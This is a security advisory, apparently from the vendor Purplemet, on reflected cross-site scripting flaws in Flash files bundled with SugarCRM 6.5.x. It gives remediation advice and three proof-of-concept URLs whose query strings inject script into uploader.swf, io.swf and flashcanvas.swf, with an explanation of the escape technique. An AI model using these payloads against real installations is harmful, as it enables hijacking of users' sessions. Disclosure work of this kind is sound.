SugarCRM Multiple Cross-Site Scripting Vulnerabilities

March 11, 2020

Vulnerability

The Purplemet Lab team discovered multiple cross-site scripting (XSS) vulnerabilities in SugarCRM 6.5.x (CVE-2018-17784). These versions embed two third-party components that ship Flash files: FlashCanvas, which provides flashcanvas.swf, and YUI, which provides uploader.swf and io.swf. Each of these Flash files reflects a query-string parameter into ActionScript without proper escaping, so a crafted URL executes attacker-controlled script in the context of the SugarCRM origin.

Solution

SugarCRM Community Edition 6.5 has reached end-of-life and is no longer supported. SugarCRM 6.5.26 is the last release and no patch will be provided by the vendor. Operators still running 6.5.x should upgrade to a supported version; as a workaround, remove the three .swf files or deny requests to them at the web server, since the issue lies entirely inside those files.

Proof of concept

The vulnerabilities can be triggered using the following URLs (replace "ip" with the target host; the installation prefix /sugarcrm/ may differ):

http://ip/sugarcrm/include/javascript/yui/build/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//

http://ip/sugarcrm/include/javascript/yui3/build/io/io.swf?yid=\%22));}catch(e){alert('XSS');}//

http://ip/sugarcrm/include/SugarCharts/Jit/FlashCanvas/flashcanvas.swf?id=12345678\%22));}catch(e){alert(%27XSS%27)}//

In each case the escaped quote (\%22) closes the string the parameter is embedded in, and the trailing // comments out the rest of the generated code so that the injected alert runs.

Purplemet technology detection

Purplemet detects SugarCRM with its version, detects YUI, and flags FlashCanvas as an unsafe component.

Purplemet detection of SugarCRM, FlashCanvas and YUI